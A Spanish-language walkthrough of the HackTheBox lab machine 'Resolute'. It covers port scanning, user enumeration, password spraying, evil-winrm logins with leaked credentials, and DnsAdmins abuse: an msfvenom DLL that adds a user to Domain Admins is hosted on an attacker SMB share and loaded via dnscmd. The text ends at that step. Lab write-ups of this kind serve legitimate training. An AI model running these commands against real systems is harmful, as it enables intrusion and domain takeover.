Resolute es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad media.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Resolute 10.10.10.169 a /etc/hosts como resolute.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
# Nmap 7.80 scan initiated Tue May 12 20:20:50 2020 as: nmap -sV -Pn -p- -sC -oA resolute-nmap 10.10.10.169 Nmap scan report for 10.10.10.169 Host is up (0.056s latency). Not shown: 65509 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-12 18:32:54Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 12851/tcp filtered unknown 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49688/tcp open msrpc Microsoft Windows RPC 49712/tcp open msrpc Microsoft Windows RPC 54238/tcp open unknown 55817/tcp filtered unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/12%Time=5EBAE95D%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h30m38s, deviation: 4h02m30s, median: 10m37s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Resolute | NetBIOS computer name: RESOLUTE\x00 | Domain name: megabank.local | Forest name: megabank.local | FQDN: Resolute.megabank.local |_ System time: 2020-05-12T11:33:46-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-05-12T18:33:45 |_ start_date: 2020-05-12T16:50:36 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue May 12 20:25:21 2020 -- 1 IP address (1 host up) scanned in 270.83 seconds |
Encontramos bastantes puertos y servicios abiertos en esta máquina como el servicio DNS, Active Directory, etc, pero vamos a continuar obteniendo información.
Enumerando
Continuaremos la enumeración en este caso con el script enum4linux a ver si podemos obtener más información del sistema, usuarios, dominio, etc.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 |
$ enum4linux -a 10.10.10.169 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 12 20:24:24 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.169 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.10.169 | ==================================================== [E] Can't find workgroup/domain ============================================ | Nbtstat Information for 10.10.10.169 | ============================================ Looking up status of 10.10.10.169 No reply from 10.10.10.169 ===================================== | Session Check on 10.10.10.169 | ===================================== [+] Server 10.10.10.169 allows sessions using username '', password '' [+] Got domain/workgroup name: =========================================== | Getting domain SID for 10.10.10.169 | =========================================== Domain Name: MEGABANK Domain Sid: S-1-5-21-1392959593-3013219662-3596683436 [+] Host is part of a domain (not a workgroup) ====================================== | OS information on 10.10.10.169 | ====================================== [+] Got OS info for 10.10.10.169 from smbclient: [+] Got OS info for 10.10.10.169 from srvinfo: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ============================= | Users on 10.10.10.169 | ============================= index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null) index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null) index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null) index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null) index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null) index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null) index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system. index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null) index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null) index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null) index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null) index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123! index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null) index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null) index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null) index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null) index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null) index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null) index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null) index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null) index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null) index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null) index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null) index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null) user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[ryan] rid:[0x451] user:[marko] rid:[0x457] user:[sunita] rid:[0x19c9] user:[abigail] rid:[0x19ca] user:[marcus] rid:[0x19cb] user:[sally] rid:[0x19cc] user:[fred] rid:[0x19cd] user:[angela] rid:[0x19ce] user:[felicia] rid:[0x19cf] user:[gustavo] rid:[0x19d0] user:[ulf] rid:[0x19d1] user:[stevie] rid:[0x19d2] user:[claire] rid:[0x19d3] user:[paulo] rid:[0x19d4] user:[steve] rid:[0x19d5] user:[annette] rid:[0x19d6] user:[annika] rid:[0x19d7] user:[per] rid:[0x19d8] user:[claude] rid:[0x19d9] user:[melanie] rid:[0x2775] user:[zach] rid:[0x2776] user:[simon] rid:[0x2777] user:[naoki] rid:[0x2778] ========================================= | Share Enumeration on 10.10.10.169 | ========================================= Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.10.169 ==================================================== | Password Policy Information for 10.10.10.169 | ==================================================== [+] Attaching to 10.10.10.169 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:10.10.10.169) [+] Trying protocol 445/SMB... [+] Found domain(s): [+] MEGABANK [+] Builtin [+] Password Info for Domain: MEGABANK [+] Minimum password length: 7 [+] Password history length: 24 [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: 1 day 4 minutes [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 7 ============================== | Groups on 10.10.10.169 | ============================== [+] Getting builtin groups: group:[Account Operators] rid:[0x224] group:[Pre-Windows 2000 Compatible Access] rid:[0x22a] group:[Incoming Forest Trust Builders] rid:[0x22d] group:[Windows Authorization Access Group] rid:[0x230] group:[Terminal Server License Servers] rid:[0x231] group:[Administrators] rid:[0x220] group:[Users] rid:[0x221] group:[Guests] rid:[0x222] group:[Print Operators] rid:[0x226] group:[Backup Operators] rid:[0x227] group:[Replicator] rid:[0x228] group:[Remote Desktop Users] rid:[0x22b] group:[Network Configuration Operators] rid:[0x22c] group:[Performance Monitor Users] rid:[0x22e] group:[Performance Log Users] rid:[0x22f] group:[Distributed COM Users] rid:[0x232] group:[IIS_IUSRS] rid:[0x238] group:[Cryptographic Operators] rid:[0x239] group:[Event Log Readers] rid:[0x23d] group:[Certificate Service DCOM Access] rid:[0x23e] group:[RDS Remote Access Servers] rid:[0x23f] group:[RDS Endpoint Servers] rid:[0x240] group:[RDS Management Servers] rid:[0x241] group:[Hyper-V Administrators] rid:[0x242] group:[Access Control Assistance Operators] rid:[0x243] group:[Remote Management Users] rid:[0x244] group:[System Managed Accounts Group] rid:[0x245] group:[Storage Replica Administrators] rid:[0x246] group:[Server Operators] rid:[0x225] [+] Getting builtin group memberships: Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs Group 'Administrators' (RID: 544) has member: Couldn't lookup SIDs Group 'System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs Group 'Users' (RID: 545) has member: Couldn't lookup SIDs Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs [+] Getting local groups: group:[Cert Publishers] rid:[0x205] group:[RAS and IAS Servers] rid:[0x229] group:[Allowed RODC Password Replication Group] rid:[0x23b] group:[Denied RODC Password Replication Group] rid:[0x23c] group:[DnsAdmins] rid:[0x44d] [+] Getting local group memberships: Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs Group 'DnsAdmins' (RID: 1101) has member: Couldn't lookup SIDs [+] Getting domain groups: group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] group:[Contractors] rid:[0x44f] [+] Getting domain group memberships: Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan Group 'Domain Users' (RID: 513) has member: MEGABANK\marko Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus Group 'Domain Users' (RID: 513) has member: MEGABANK\sally Group 'Domain Users' (RID: 513) has member: MEGABANK\fred Group 'Domain Users' (RID: 513) has member: MEGABANK\angela Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie Group 'Domain Users' (RID: 513) has member: MEGABANK\claire Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo Group 'Domain Users' (RID: 513) has member: MEGABANK\steve Group 'Domain Users' (RID: 513) has member: MEGABANK\annette Group 'Domain Users' (RID: 513) has member: MEGABANK\annika Group 'Domain Users' (RID: 513) has member: MEGABANK\per Group 'Domain Users' (RID: 513) has member: MEGABANK\claude Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie Group 'Domain Users' (RID: 513) has member: MEGABANK\zach Group 'Domain Users' (RID: 513) has member: MEGABANK\simon Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$ Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$ Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator ======================================================================= | Users on 10.10.10.169 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. ============================================= | Getting printer info for 10.10.10.169 | ============================================= Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Tue May 12 20:26:20 2020 |
En la salida anterior encontramos una línea interesante donde aparecen indicados un usuario y su contraseña marko:Welcome123!
1 |
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123! |
Parece demasiado fácil, probamos el acceso con dicho usuario pero no conseguimos nada:
1 2 3 4 5 6 7 8 9 |
$ ruby evil-winrm.rb -i 10.10.10.169 -u marko -p Welcome123! Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError Error: Exiting with code 1 |
Con los datos obtenidos, generamos un diccionario con los usuarios descubiertos y utilizamos el módulo de metasploit smb_login para comprobar si la password descubierta pertenece a alguno de los usuarios:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
msf5 auxiliary(scanner/smb/smb_login) > run [*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Administrator:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Guest:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\krbtgt:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\DefaultAccount:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ryan:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marko:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sunita:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\abigail:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marcus:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sally:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\fred:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\angela:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\felicia:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\gustavo:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ulf:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\stevie:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claire:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\paulo:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\steve:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annette:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annika:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\per:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claude:Welcome123!', [+] 10.10.10.169:445 - 10.10.10.169:445 - Success: 'MEGABANK\melanie:Welcome123!' [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\zach:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\simon:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\naoki:Welcome123!', [-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\:Welcome123!', [*] 10.10.10.169:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
Y tenemos un candidato:
1 |
MEGABANK\melanie:Welcome123! |
Con los datos descubiertos utilizamos la herramienta ldapdomaindump para obtener más información del dominio:
1 2 3 4 5 6 |
$ ldapdomaindump -u "MEGABANK\melanie" -p "Welcome123!" 10.10.10.169 [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished |
Y obtenemos información como la que se puede apreciar en las siguientes capturas:
Donde observamos, entre otras cosas, que el usuario obtenido pertenece al grupo “Remote Management Users”. Así como el nombre de la máquina que es RESOLUTE.
Obteniendo la flag de user
Con las credenciales obtenidas del usuario melanie utilizamos la herramienta evil-winrm para acceder al sistema:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
$ ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123! Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> *Evil-WinRM* PS C:\Users\melanie\Documents> cd .. *Evil-WinRM* PS C:\Users\melanie> cd Desktop *Evil-WinRM* PS C:\Users\melanie\Desktop> dir Directory: C:\Users\melanie\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/3/2019 7:33 AM 32 user.txt *Evil-WinRM* PS C:\Users\melanie\Desktop> |
Y conseguimos con ello la flag de user.
Escalado lateral
Ahora que ya tenemos un acceso al sistema continuando buscando posibles puntos débiles que podamos aprovechar para escalar privilegios.
Nos vamos a la raíz del disco C y después de varias vueltas descubrimos algo en particular. Enumeramos el mismo:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
*Evil-WinRM* PS C:\> Get-ChildItem -Force Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hs- 5/12/2020 10:33 AM $RECYCLE.BIN d--hsl 9/25/2019 10:17 AM Documents and Settings d----- 9/25/2019 6:19 AM PerfLogs d-r--- 9/25/2019 12:39 PM Program Files d----- 11/20/2016 6:36 PM Program Files (x86) d--h-- 9/25/2019 10:48 AM ProgramData d--h-- 12/3/2019 6:32 AM PSTranscripts d--hs- 9/25/2019 10:17 AM Recovery d--hs- 9/25/2019 6:25 AM System Volume Information d-r--- 12/4/2019 2:46 AM Users d----- 12/4/2019 5:15 AM Windows -arhs- 11/20/2016 5:59 PM 389408 bootmgr -a-hs- 7/16/2016 6:10 AM 1 BOOTNXT -a-hs- 5/12/2020 9:50 AM 402653184 pagefile.sys |
Y descubrimos un directorio llamado PSTranscripts, donde podríamos obtener un histórico de comandos de powershell realizados, así como la salida de los mismos:
Continuamos buscando en su interior:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
*Evil-WinRM* PS C:\PSTranscripts> Get-ChildItem -Force Directory: C:\PSTranscripts Mode LastWriteTime Length Name ---- ------------- ------ ---- d--h-- 12/3/2019 6:45 AM 20191203 *Evil-WinRM* PS C:\PSTranscripts> cd 20191203 *Evil-WinRM* PS C:\PSTranscripts\20191203> Get-ChildItem -Force Directory: C:\PSTranscripts\20191203 Mode LastWriteTime Length Name ---- ------------- ------ ---- -arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt |
Y por fin encontramos el transcript cuyo contenido es el siguiente:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 |
********************** Windows PowerShell transcript start Start time: 20191203063201 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** Command start time: 20191203063455 ********************** PS>TerminatingError(): "System error." >> CommandInvocation(Invoke-Expression): "Invoke-Expression" >> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ') if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }" >> CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="Stream"; value="True" ********************** Command start time: 20191203063455 ********************** PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> " PS megabank\ryan@RESOLUTE Documents> ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Invoke-Expression): "Invoke-Expression" >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }" >> CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="Stream"; value="True" ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:" cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** |
En el mismo encontramos una línea muy interesante:
1 |
cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! |
Tenemos las credenciales del usuario ryan, así que verificamos las mismas accediendo con dicho usuario a la máquina:
1 2 3 4 5 6 7 8 |
$ ruby evil-winrm.rb -i 10.10.10.169 -u ryan -p "Serv3r4Admin4cc123!" Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents> whoami megabank\ryan |
Y ya tenemos otro usuario, estamos más cerca de llegar a root, aunque aun nos quedan varios pasos por realizar.
Escalado de privilegios
Ahora que ya disponemos de un usuario con más privilegios, revisamos las búsquedas hasta el momento, en concreto el dump de ldap realizado al principio:
Observamos que el usuario ryan, que pertenece al grupo Contractors, está incluído en el grupo DnsAdmins, a través del cual podríamos conseguir escalar los ansiados privilegios en la máquina.
Después de una búsqueda en google, encontramos un portal donde explica la posibilidad de aprovechar el grupo DnsAdmins para escalar privilegios.
Uno de los pasos importantes a realizar, es verificar que el sistema dispone de una versión de 64 bits:
1 2 |
*Evil-WinRM* PS C:\Users\ryan\Documents> [Environment]::Is64BitOperatingSystem True |
Una vez verificado, crearemos un payload que posteriormente subiremos a la máquina, utilizaremos para ello la herramienta msfvenom y generaremos un dll que otorgue permisos de administrador al usuario melanie:
1 2 3 4 5 |
$ msfvenom -p windows/x64/exec cmd='net group "domain admins" melanie /add /domain' --platform windows -f dll > /home/asdf/share/privesc.dll [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 310 bytes Final size of dll file: 5120 bytes |
Crearemos ahora un servidor smb en nuestra máquina a través del cual nos conectaremos para descargar el dll malicioso. Utilizaremos para ello la herramienta smbserver de impacket:
1 2 3 4 5 6 7 8 9 10 |
$ sudo python smbserver.py -debug SHARE /home/asdf/share Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed |
A continuación utilizaremos la utilidad de windows dnscmd para añadir en la clave de registro nuestro dll malicioso:
1 2 3 4 |
*Evil-WinRM* PS C:\> dnscmd RESOLUTE /config /serverlevelplugindll \\10.10.14.217\SHARE\privesc.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. |
